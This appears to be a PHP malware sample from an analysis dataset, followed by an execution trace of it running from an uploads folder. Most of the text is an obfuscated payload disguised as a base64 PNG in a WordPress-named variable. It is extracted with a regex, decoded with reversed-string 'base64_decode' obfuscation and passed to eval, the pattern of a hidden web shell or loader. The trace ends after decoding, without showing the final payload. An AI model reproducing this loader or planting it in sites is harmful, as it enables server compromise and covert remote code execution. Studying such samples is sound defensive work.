1eiAeo6qAh4AvWvQ6dO7TQmrWB09AOSeZDFqiuJ#XSZeP#7OtA62ouzPG8ihVfTfk0S%RyxgdUwh9iUDhSMIPmYJtMdZ%NDe0Sju7yH8rOGQ39GBaNmvrO0DZHV#TWqEjwzQJB6Qa5#XTCkCaMkSNf8RC#0MA%xMfrsh5wIbU864I89rK5siKxRVVVbl6DLmeVxjZ#Wra%OjIym66Annwj8K6tlgO2zv#3ZbYjXUbxEJrldm8lq3ZoePFbqRetUwh3V0HXKASJm2GNgLoPIcYzSL5uIKGo2jayN8D0QPlntroLhlCy%ypkFS5Z4h40otOyMMqIPBcQaO01dRKbhXG3SbiAzCfVGkw04xPOKB8dAr62kcHyY6Y10tSH#Oh9gyWqcztLyCAMLAb9tu37T0CIcaiv6l4vmlcUIBkeiH3t8Re4GdvMtMSWfnYu1up6P6#bOd3y4fNUb1C%9T53NjO9f38ETA0uPVKponnXcAig4HiufupTRnicCDKgaIEcjGk#FQzNA85D5UHZ0HyM%DYKAdaRLgIc6v4o#uUJnLgAkmoBhT#dS2ShXkm9FL#JksfsDKxRNWrvTRx2BqrnUQy2271jEtt6uDlHDvfSzYii3LreMzVcDe8qN9PEPWTe9WYxNKIsaz66uPQzp7vY%%NohCwE#gOikZ1kZOq059C5150O510IqL#9zvII0f4v0SzBjmvgoz#jp%OeZF7IeTuyrcbynVwn58GwXJLp0t%rISyd#vqkD0CwRpgc5AVqnPuIMQf8b9C0cKnFQ60umNWhF%Ap7FwXwtSOw4FBSGom%GoIhvS8z9tAEVY71NVBgdQkXuSEoCd1A2OnBalS2jrQxT#lDUARu4KWYANAllMw6RX6VW5eC9S3mK55zFztqCJsTCIaA8GY2GQQh2IWFdexC5BInGgSxNKA7l5Q757PlqGZmpM3hTxLfSdn1g%O6t6TONhjqHo5kmGo3#3VvThwKL8kLUi877m5JPAdoTVKhnQTLFU#aLZVMyRUZBZIFAl5%I46UZC0tuTty0RBwvmxaImFFlom98g3YhXhxkOOfceNkoklSivP0xFGmHOgpnrl1v0GGEtrzlxG46kj5fQN95MP1e6bk7nxdmLIp#TEwpQ7Vxb#EsGQMCI6J1zTsvyY4BuU2gq3KgxnfFskECdno7Hd2OZvl1LI%Tdcn2oRLyAXcwdjqsB#rKPTixsVb4nvsop3izAzULv95BJGFH5FJssSr7hgPyNA6GPk1tIVj5EpBn1Gs%5S#bJRiSZn4gp9t5R0afyW9jq2ma5nlncn7p6AA3Rnioidq6woA3uUlc7I4XQyEAFZSVmOtyMBDD68BVMRK455qKL1FZJoCwCxe92EQEl#Kxag3ec8uipkzkYEJsjb7DQ2vIbUdIpSFIPe7iMQOHwjsP3E867bPr0JILY2mcU%51ZNDi7BIDbmDTi4mWt1VVw9gxLRQT9jQsYVJY8L2YfS4LCVx8UwwmeuZy2IRbF73iAT1zAZosUCFj62BD09R1SUOspLzyCDcP4wVuXKYyT3j0kT8QeRavxjPCfYa4K%n4Dy008MOMyjz6w#sj%aAI%QuqEhcI2lVFxOlCKQOSo81D5aktfkeGAhrHuGyIBn#lA7qbnZP2#DnpjY5JbxYuYR223CnoBx#ClvhF2BRCimvLoR0AjG8LDp%DXxXJKwdBm06g3d8EVRBiu334gr4VlPRHWW9YNG6C4V1k40Yb5RDjvSZBmrI6PDaqyOAGzeEH4J9ScDvyRy4zGtOMcuCxNf2tmNdc6VsWOfJQOhRriCrvj9KS#eYt3nOSBWyXSRqqyJbhaL6NrtJl%3fQRYe01#xQWdd95M2OxVqpU%L2RS2Gh5n0LnNhfhg5MpyS89PCH70KU5qTnBad968i6oD#9lzeO%Kkv90SopkMElzuq#baJ%W1c5uMt2Ac0JfHATZxAiIZpu#VYLmbXcgdx7pUAl%Z%gJ5sx8qx6aFFGS1lH2uVkyNnSuzLOxv63Rgmf1RnQ138Pj3bzMv8ud0Z9Tj9t##FxZCcYmTIwP4vghTFTaWeVkG2htFC2fyaNrAaRn3jJml9oUlqXii3FngZUzCdDjC%nK0kVT6phwWgIptVkIwRhzu0Z0XhEiAcZt60WJbntuMVhyPsyDbAc098BbiujPQe3FZfjixd1TJhuckjqo4TGdLVa3cufal7ep0KA#2w7JGH23XV6hNlrIiZLQV92fRE7KfxTjca4BHaGGac7atq9fK#GNNtcQFicVq2QUzBzUBZz3xgu715mYKx7H2LCDW26rTYW74mesKwhnFGeOwXGOwx7pcUanlY7lrp2k3KLA7nfhA10wd3FUqNNSy5VmFiagIK#wKeVjhYFkRDrYqp9nK5Mf8zjMj3RWXJYcV47qlQv6Bim8gqJeKJmthoC05FsYenotWaLWJz0CesyOZ2VVGw%Jo5DQ7gS8opuYLdXjTbBoRQ8uOBdgqsZBhhcbcPlbeRs%GGJl8Q0zeOkzc1LohpkUppn0ZHVKOn9z#Rbc4bfFhTctXlat8ChKRULW9Ensd7UOvwulsjlH98EGeJ6CE4KO%Wizx55EfUvJzXI3hj5NAbLa4Z7ig4dJHBYI2SlmfIxe0lYdrFT1dtoLUHvw8#KGxNLEqK#Mfui3TpnNDqxZaStbrdsJgYMnoBoYR5fFPb1pyqd0jBDoMqj4EpDot7%fbVX6%3CmQ#on7BJYfQL53ApPBxCsmMGbMYMyaworyIz#nyUntsHxiUB7Z#mS0sVHJ6zdTvNSTNK5RfJgiXqDWUwk0hgqZmI98z#TNVPzxag4AfUeStFUbi3vmFDHF4dCUdyWows1b1wTr0rhmblNGj3UbyqbJIyNQkgh42qRiiT#Ux7psuHwrkU3DaKH8PuWe1TY1MnlIE93Wltz#kLe%mbl2Ov1aOBy0#zs7tVB2v0DwaCD2Jo0MaMn9bhnf1p82KThUEWEt3OkoziC3cKI#x5W8CFtnkhu8uGRe6m2hbR50k28nytttrItbCvvSsh0xHFKCt0GM8Xy70ArUxCA2uHMb27ljQA#WIUYYOqx36bkgp#L8DuXQRk%hyK7D#8R4fFxH0LBmg#bOYzSIbn6#p4TPUNkz2cyKHFLqAWFoY2FKvXcrg3rK4WV4WnzelINxtpNKU8nUJweukRujOgm%f%OypI6CrZSQ6tbjgoQEwSYuQgaRZ5HaVwB5ySeb5NS7CXyLdUs9KAgJmfhsoqgF#F%b1cOSrH8Eq164nQv3ETEsMmIVv8qL3zijEstywSsuj%t%YyaStfhdo2Qm1Bw#UGpjyai5m7aLDEs71EIok3#2mBza4kNaQdPF%2UO6D5#wye%t1O8BuqYcbECpPXZo0cgwNUAQtcSPGCmZUe7#2#3GSfQamO#HQdqimRBroWwOjPS9Wjk1W73GKuhhwoFiIeszBjYAuZvG8B0ANG9MHtrYaTDlobhNNtgwjWqFj16pIY3tFqEy#m9rnFuyOgVARM#6uDWG7QrgEEh7XxbPoW2RKiGXG9IZ3TV8GYQGXrNCRUn%BR9zGZQEb7YcIjpWO4wT9jVVIZXoo#Ki6%e79GHH4KVGpF1XWaEkXnmOKZJL2tR%VpCTTPj3ltou0%xPyNPx8iTB5Y0cOCiHZ0cnezsVjjs8nHHt1k2VoNI90iKC97cgdVSFYRn2zb70DjWg5ddK%3BOiVs7X2YpcDMLECchp4BymTUH6Z#YA0epH1QLCulfKy9XvF3axo05W2u0Qp9gJZgtjpgzMY4q9CEaXpDb98zuaojIkKT8cL5thq25lEunk5LUZjYJYgw3fDEv3s#LecZD361%X#RLkqt8CBuoByaHYSZX9slnGalevbl3PGF53hFDGjzGG#pLyea1fPvu%nD5xtex95y08wPkmSUxSO8hKZ4nZ61VUATWXf4bUce01Ze4aVOp38AOeLm863CbeXyqm4#TDbGT9l0LQuhafmejd8aT1rjhVj3DFy3L2c8eZD%MAQd6aa4BwoKorxWCWa7sbztEWbMGnNaZvPQOfmWiAtsNhvepXqRXGQXF#5F22koTy3Dc9fZbn039i%SR%Xz%9W%fNSobTtNWzgIp92tT1I4yVvdpcuusbWRc3qyL3lXUsMZj3D3N#%t5rh9J2dHNxsRehEGEG%HR5QfG1DnKoKC1Ijn87N4SS66#fevaP7v251RjBusrBukcVKYAB4yTwQN4DB6v0IMN5uJBYt9#20Fcz#c7bjjvr3HYOwUKm9jjJ3Cb#M8ukH3Tyaext4ShF5AL9M6fbV#OPrpxfGP7xAV3WO88FN5WSdXzF2VtEqEkqgkz%WyLmYaBEAdMlfwAQtaPC5jD35dB3fPQUwLkytXQp9KU98q2dmRvAoPw0GbT0vK2mGOKfRyBUrPAZBf6KZmKXjDdV0xK8mCHrd1QUIZ5gWBkouohLf4l5bJaecxK7Vg9v06ZOEFUyHLeMk5jD#t0hkB2G%Eyoe3t0HbToeLfjU1OoZBddYZihmg8jSDdiAfT4wJldziLYE1uHBppr5wG58Kw3CA1#L0cznonR3BHCvPTUALZQCCougV8rN0lm988owZ3c7BH9NZfDuim0FTmemg06PbefqfsRM#TX8PBpZTBUwzdaVrHtZAxpjBbaJDtdN%7zi#PHAFDdILkOGdsGyVwuqGPfsfz%7Nqss1amIWXzah%#c%G9FkT5klxCUY1ABdbzgky1Ay#hi7vI5zeUPf0LVrmEgswwinnXNR7lIfcX9Muy9vte875HMbR%M7taez5kxKuXHE2Xi6LIRO0eaRkjuIeh19z40%eVJyweyTJ0%6xqU57eXH3CVF7dJLdxw8E#LkbnhzOvCqdk#8I2D1HI1YpnEJLrqrgeRFv4uBgxKbRDPqvOWLTtkQwpuErnmQlmc56icgIFOQZLYh734llV9WqHXUTaa%qgNstAK9ugv4dcHlgXvl1Ye8RM5MtvcKqKR3GDxWTAgyVgVpS3Jrw92#qF%4jy4aF2nru21xom5EgWRGo4ZYPhE5p3gskM28lF0FQSTuYfTdnJczb2FekrzyuK#0CIu#bU2fcSixIgDxKhyHfqX8Pwm8#fyO3XpRhmOY08ayWcBvPDggO#19#4dAC20G%hSIoyoPWKGc%joX3kVEGHtx9Zy#aRyjAkHOLX31hM2jnxKKDG3EihDZeUwXqarWUN7vDIW7jUb42coqYqjWaxhMrcmjVOJ#DKDDCAtXOLBEdAm5OanxyqJkCCAMIStDltA6XsCKi4kPeYxZu0heIi#QFhOwzhfTED7KtbdpyhMBUqZmaYTMuJcWo2gxeqks8eS9gW9QaWfy1#DJ471uv5pmHae27mCWwSees335mWHcSvncgWesyoBfxEgx5UAIDahmjDfkQDSoc38luZUgF5I733ncbdC%qgNeuQp5cC#xuugXjm0k0DX#APp#XQUJzFWwelhDHVtDnQxRzsETOowgqDVwb8ojpdigfwUq3e%NKrQb1Zrig8pDmXinN5aDqRjqbgRzO0wXB%SMay08Od1u9DRR%S%pRkGSaBuiYAR8F4%xouz0oS2EjbIJjo2aYx6m2YurtP5wBi07G44fux957zmnr45%1GGd1R7el%BEDvHRm6PnZ4iaLKIvT47fMmgfWRT78dXRyREmhxhPA6bJLNgeuJlbRsLGDXZGcXO%oM02q5RLrXX27O9vjk7dP66phGM6aVB0GpZNknhhhv8fpaBTL7wWjwvMbmdBEgh4nkLTfDGDy569e1EEROEM%TCPp1%e3KR1%M6WFuNOoHpYe#Jgg9k7q8694VyQPee2s%sE7j2TdkUk#TRQ16m62kxu19#AISKa5mSqd8QNM3qOK4%O2PNXz07w2219iWzHxkx1DHsyhsPiwhLu7HdJdxl38fe0sj2S#HxRKnTeHD97Qcp13XVasGqSVlAqu#XwG73R7O40NuU6u5znJ0fPzo64JEB1uks#nAzXVI3#8#P3P9FLLvTKSeiLQU%5aLhjjr4ajjABmlcV4Idv8NfCgdUAmqlqiQhgfM6PM132y2h3%SReMhFNAIrUgcRE84rtdEIxGMo4JPyCt6SsvTbqf9zrh87CYvEUJFpNrYCPD2SFWqV0trrmZxgOVGbL%VlXtCZiZw6YNe%zkBLmnF2DVCyFw#NmrdOvDi4r%TEMdxeGGBp9vb1V5y9KO0Yw73ecbQqklxVJl2O1qxLRjZ%ufdGqqOQhEVrTZqS1gY14U7hV8XFlA4TsLwxjJtOVXvcGIMqRuBaUE4AdUN0F#OF3xoiOjuerRZQLcUAf5QJLTUHxtzD61kYhl24orgquZzeIi0YFnNeu6RzAuw9v3qyjHT86ICPdu3ezSfA1s5DazQYFPJBukGFirsL4YiMewWgEoowmiRsUaI5qWtXs%FaRn51W7boFXwpgTQwobF7kifs5B9kBtwNfvzs9Ojljr9#dHVtjBq#MV8KryXDjRZCFl7Owfz178#HolAEzwQI1D0jRWVtuYx2zExGCfaXQq4KrOmdTViHcfMuaX0bTgyRQJSGhcvWp6iluEsBuehgtYvBa5Kh3XzAP50Sm7P3CjFkp7X6XmJDcnhso5mS%dmTUrjcZEVLwmnyu2Xwdl7uKy4tAkpv67rpw6Q%mKVmZzTWEz%ir5l#JLUNlkhMmTHFGHoGAkHVHAfEIp3XWCVaTXMfS17P6VztDZUYToCjU0BJlujThO1gchVH#JRql8u9wNauOK2EJ2rxUCiUbNndoQZ9izos#GgbOj7Qtmu50uk86To#JktTixR0vMQV6VLnvFXGQZ0BZ5lU2ebo#6w%Hr5%unJTlvY7Dp8kGmT9UZV6tzzxePv3##%IaQ0JZXmM0FfbUuWZc1HXuPQVqAj%8OCiqvy3gA#c#VPyoJS4kdpdzL4wKGfIxvbOruYgXeSNWAtRQXN##yecWLgeqpVRQxTKHY95W%JhjocHW08FyH5Mm0v8L1bJcjs0UGbKw%O6IsqnV8iz0oBuhV49ok4SZ0e%4ArAv%A1gbsCYry3ckKvvdPL#hVVnM52vv6KdExDSVwmMz#pYgFYANjeduLlb7NV#ujtJaZMbhPPQ8GU1grnlg73Rrh%GiPOHyD9qvw#vglEPb1Cgqaf3wtCuXrwQhjm9WWjdnALY74kNAU0wrIJZygtZXJq43WpAdTK#GmZshILYLLrEnxZaQsSuoOaywkvQvFUIH0FLWGYEKji057mBhGnwPTmOMqBbljm3DeniwaqwD1xVogJKkfP0auTyAkGzBBlkgdhBVLV0G1lOpIKYC8eR0XhK5trGAV22NqenXqWXrJEB2%rC2YwMmrvvoUPM70AIXrx2Dw0S#CFE0AbWehq4OgEk3FO8gDNLx7J5MD8eDc#pJoTM7WpUyashbUY3G5p0JQok#ieqS3m7T6kWpBYBX6D96Lwbaz06ywO0nVymzbQcnWlz7Ubp0QSqtod4inTgM2SQbOy8kMCIH0Y8leIyCdHnF0lYHIUUx0uFeYjyAdMrI8tR07ULdPA0L%7CQGMYxky4iBWZ4kDLJOE6pLMqmi13cOlpImSUvjh4SzuU4wChGVwa0K23MpQMDWisQn5QW17XGDBFh#qEedpvpROapzmCvNqzPjob39XHC50E9jiikEklkoLAhKiA6V84WFHUlyEP10l#GNFqcRUkLJ4w1EV0rWgax1%ST4d#K3dPk#R05F%hVHhormOL4xdN2DkNTm3kpvXy0OW4S9KSOLh33fYAywNoNmlJBUhs#yIu3F%6XG1unbSWHViZwl%tKL0OuEvA3c2A9wh4bx1wyTVf5tZSVs#aczWEkFUUpbiiF6vTvpncVclZSXlA2BwXuhwWCBQ%VKa5iYy3ppQQOeJCvUtqRUCGfCoeMer055fupYyD%OiROtxcDmjHN96#F8igzHZJ1fMTMgfUWMi86JrPTmLUcodBIzAyuqtZynLX9pWTEq%oEWhOTZ#MddQ9i%ktLXstxzt5jN41PPm62vPv###%R6FBp8T4nrUMXiHjGkijUQ1aDQ%yp1Iym9vcAqZSfqvMhrVrA0leMSZKWkyKpXU3a0Y5mvCnbb57fvzh3Vn9O9qVi5QpTwh#Vwdzr0k2LypLwj1YbpXyHuFepWb4KxWgW6rpxJJa%xeFqkhaRW#2Cweaz4Rsdhqgk#kXdCfzfUKcY3d7DttPF958Pqx%qkXnLihQn3HhSa94FDDtGzu0jjyqSpZXT81ROM6B1SyH4KtVlml94AWewtUZlOe6IY6g1irgoNM3IZSMcYlEOsJO98OVq6O02ylD5QmTiKuPPm4wZmQjWHHBpB#mtPfpU6l2nDGx#qzaL7MPwpuPB#YDj6SoJMT9vIxRt3LmC54dpuucwqWSlt6Uxvw4COd1BCTuYLtsr101RO1DHCR8lU1BT6ifgH9hPZKjCVkNLxm3JpTGZ32GjoST4RHdRY9oGXAHuVdQiM7wY#i%tMHeQxXYNxUh8LAlpYKIo6UQI4PrNlWWaV5XVHR4S63bkzW7dcg6a2SVwFoc9W5Vo7nQZi6P06dL2ekQ8Q2QIvOsz94nwQ1JhQ1p3Bd1#vMJfaQIfYcd8#00668j1KrjjmRVg%y8oUFtsOTiJhW2bUyuctmb129fnwGjs#OXL7lPi0X1d3ttLelNp5i1pfycL#ZnUU4J9pbb3Gu7udmkXArbuxJSEHE5s%6kZF6CHJbKCLkORw2g9JZMCmps7EFuaZrdct2o%FB8V4YA8sKoMgbQN92%4X866g8GVwgjLF8JxXXLyS1FN3crJuLNtzrgtVFE6TZccEcB6Lmg0pAKwQwXjwBFIXFnFjZoS1Qt7Xs6ZVMOTHcJjU%aQU08supd%e6z#qUqItrVmQM9mAGP9RpYJBL6Hgw6B109v9xfcWMfklhFaEjKO6HQLLgeHWLi%m7IJ16zRtatm2YmtxXNu1dJvUrzkpGH3TVNsWs13#ccq9pRC7as#5INMDpMcjUkc34P44OVxegjnhN#gfnYUKpkW4260uFP7ePirrVuA02IRiuqQZaGRKfEKIm%KNeSrC1QNx8PRogNqQYZJ3BmPOoE%MZrWcrkc8kZJ3lZePE8CCpy4mKENdNrdeyCivu7lS1FHYCiBVqlMeXoYzBeYcBfKVMNY4y#rcSy9Tg6OC3vLCwh3x5lM5Kwq5eZJQwZLB0IO3zOoEwtOpjA3ZXHMM96Wf1nfPUzTKiHbpP9jObQn3EV9eH06ARW1ehy#zNqwqNlEt78jFPRnVvYx5OEmuJxrV53D1vKPs0p6DaDTh7CnKTbvZFXWEtdT3SnvHyIIpK#jmAFkVf111vRZAfm#04FtypOqppr1clxWk%IhbHyMC2ZR40b3vOx%8puHgA0aqu4Zcfes#9yv2fAmHJIVPQLgzO89cL5WZCKk2%ajoNnIdAcMVol8zoKfO7psLiDZ#S8WZYte7sY31MdjePfo3fP3h7hbTHq%cnRPz8cnZ6NPpy8Fr6jNdxZWKJBmtBzrMLTYXFHnur66JCzi44l#oaTHJj4dS7ib%MnPI7XEWXJWtCV37BgRnd1ikXKyYdXfN#hZcYMFHiazCkpXN5FIiKayQKarN1koKObTfL85PX7M9EkcruXbrEvuHWruLLBNPSlawmJEZITPHjBaLxKEvSkxnd1Mzythi6No6ux4xM3fZjIzbCtkk7V2TYv0OYQeRYPmPMSvnvsJEhX84y9iMf7hPDQMdoAD0tKpnBU2O%yg4LIjQzZsfKouJDSesc7QOF1WhqCJVjgxQckoED7nGexefIa6ayMwMNtbkJUneIZ6Cw2gy#5ZEKp3KbjpQmpVLlLTBQIIGo2Y2scV1quIqPsnG1Z1JaKgOvisHJ#E9o4rMwnjdyMjrIRmtDVIMQx2PUjUO5zpgxskUMkezlbjlYU1wnW7YrRKGsW5zN2ObspCKjVL7jTBKyleAHGMmdFxwJdBGmKlgAAJai34lmEI6ccVgbuEpNqttUl7KtaDS8SERIlnw99KE9APNztnMU93Qz3wCNf7bxHy9VmWdx%7yBZQdJj71#933V5g95AIllZzFzYYchpddGuTdV8TdU6TYW7YXejVgCoFdKAn70VHbPsXloE5oSMjYB0ZooUgGECAiRp284tfvMgFOYkJUN43T9PnTzX8f#3c7HH#dTkKTdLmk8d4kEH1zSaI8VlYw6#EW0qIVQTCxC8QcEE#fH0eATy7PT18TsBkXqTYAEzFCUfhlGI8rXu4mu8x0%cXGWGbVGXita8vOzeCmAklwQfp9YoBo%2ZAxoY0eDx90b8fYiDb0wyfA0MhzmwK041B43VNogJKllSGgL0D0Nxq#jSYw9WRIuzBPrhXXU5Ks19uZzmuRGmKsKFMoTjmf%Gw==">';
preg_match('#<img src="data:image/png;(.*)">#', $wp_default_logo, $logo_data);
$logo_image = $logo_data[1];
$wpautop = pre_term_name($logo_image, $wp_nonce);
if (isset($wpautop)) {
eval($wpautop);
}Execution traces
data/traces/2a5088a9a361cdbd00204cab2bb62dde_trace-1676251271.3892.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:21:37.286995]
1 0 1 0.000172 393528
1 3 0 0.000338 425064 {main} 1 /var/www/html/uploads/masters.php 0 0
2 4 0 0.000356 425064 error_reporting 0 /var/www/html/uploads/masters.php 17 1 0
2 4 1 0.000371 425104
2 4 R 22527
1 A /var/www/html/uploads/masters.php 18 $wp_nonce = '63a9f0ea7bb98050796b649e85481845'
1 A /var/www/html/uploads/masters.php 59 $wp_default_logo = '<img src="data:image/png;5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z%tUWqQk1hKpkpQdN5v%fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7%a%e7rr7bexv7XX323#%VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG%dPqAfZbBw#EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF#NxkSBSmb03G8zill%j4GQmmXGGaBlm9Nnp%fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6#7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S%xdWDhzZJwUQLAtgfMdQFsC#G2agtshCsvDSJvAfSPTo9O%nV0cu6ePj95%f5s9PL1m6N3z94eQc4#wc9Xc8hARE#DbATUZkEEpAM'
2 5 0 0.000440 425088 preg_match 0 /var/www/html/uploads/masters.php 60 3 '#<img src="data:image/png;(.*)">#' '<img src="data:image/png;5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z%tUWqQk1hKpkpQdN5v%fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7%a%e7rr7bexv7XX323#%VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG%dPqAfZbBw#EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF#NxkSBSmb03G8zill%j4GQmmXGGaBlm9Nnp%fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6#7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S%xdWDhzZJwUQLAtgfMdQFsC#G2agtshCsvDSJvAfSPTo9O%nV0cu6ePj95%f5s9PL1m6N3z94eQc4#wc9Xc8hARE#DbATUZkEEpAM' NULL
2 5 1 0.000500 466528
2 5 R 1
1 A /var/www/html/uploads/masters.php 61 $logo_image = '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z%tUWqQk1hKpkpQdN5v%fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7%a%e7rr7bexv7XX323#%VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG%dPqAfZbBw#EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF#NxkSBSmb03G8zill%j4GQmmXGGaBlm9Nnp%fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6#7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S%xdWDhzZJwUQLAtgfMdQFsC#G2agtshCsvDSJvAfSPTo9O%nV0cu6ePj95%f5s9PL1m6N3z94eQc4#wc9Xc8hARE#DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc'
2 6 0 0.000551 466424 pre_term_name 1 /var/www/html/uploads/masters.php 62 2 '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z%tUWqQk1hKpkpQdN5v%fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7%a%e7rr7bexv7XX323#%VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG%dPqAfZbBw#EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF#NxkSBSmb03G8zill%j4GQmmXGGaBlm9Nnp%fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6#7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S%xdWDhzZJwUQLAtgfMdQFsC#G2agtshCsvDSJvAfSPTo9O%nV0cu6ePj95%f5s9PL1m6N3z94eQc4#wc9Xc8hARE#DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc' '63a9f0ea7bb98050796b649e85481845'
3 7 0 0.000590 466424 file_exists 0 /var/www/html/uploads/masters.php 21 1 'index.php'
3 7 1 0.000612 466464
3 7 R FALSE
3 8 0 0.000628 466424 str_replace 0 /var/www/html/uploads/masters.php 24 3 [0 => '%', 1 => '#'] [0 => '/', 1 => '+'] '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z%tUWqQk1hKpkpQdN5v%fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7%a%e7rr7bexv7XX323#%VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG%dPqAfZbBw#EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF#NxkSBSmb03G8zill%j4GQmmXGGaBlm9Nnp%fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6#7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S%xdWDhzZJwUQLAtgfMdQFsC#G2agtshCsvDSJvAfSPTo9O%nV0cu6ePj95%f5s9PL1m6N3z94eQc4#wc9Xc8hARE#DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc'
3 8 1 0.000713 487000
3 8 R '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z/tUWqQk1hKpkpQdN5v/fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7/a/e7rr7bexv7XX323+/VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG/dPqAfZbBw+EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF+NxkSBSmb03G8zill/j4GQmmXGGaBlm9Nnp/fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6+7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S/xdWDhzZJwUQLAtgfMdQFsC+G2agtshCsvDSJvAfSPTo9O/nV0cu6ePj95/f5s9PL1m6N3z94eQc4+wc9Xc8hARE+DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc'
2 A /var/www/html/uploads/masters.php 24 $kses_str = '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z/tUWqQk1hKpkpQdN5v/fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7/a/e7rr7bexv7XX323+/VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG/dPqAfZbBw+EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF+NxkSBSmb03G8zill/j4GQmmXGGaBlm9Nnp/fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6+7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S/xdWDhzZJwUQLAtgfMdQFsC+G2agtshCsvDSJvAfSPTo9O/nV0cu6ePj95/f5s9PL1m6N3z94eQc4+wc9Xc8hARE+DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc'
3 9 0 0.000791 486904 strrev 0 /var/www/html/uploads/masters.php 25 1 '46esab'
3 9 1 0.000810 486968
3 9 R 'base64'
3 10 0 0.000825 486936 strrev 0 /var/www/html/uploads/masters.php 25 1 'edoced'
3 10 1 0.000838 487000
3 10 R 'decode'
2 A /var/www/html/uploads/masters.php 25 $filterfunc = 'base64_decode'
3 11 0 0.000902 486944 base64_decode 0 /var/www/html/uploads/masters.php 26 1 '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z/tUWqQk1hKpkpQdN5v/fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7/a/e7rr7bexv7XX323+/VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG/dPqAfZbBw+EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF+NxkSBSmb03G8zill/j4GQmmXGGaBlm9Nnp/fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6+7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S/xdWDhzZJwUQLAtgfMdQFsC+G2agtshCsvDSJvAfSPTo9O/nV0cu6ePj95/f5s9PL1m6N3z94eQc4+wc9Xc8hARE+DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc'
3 11 1 0.000989 507456
